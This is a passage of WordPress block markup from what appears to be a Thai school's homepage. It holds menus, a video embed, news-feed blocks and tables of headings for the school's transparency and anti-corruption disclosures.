/wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{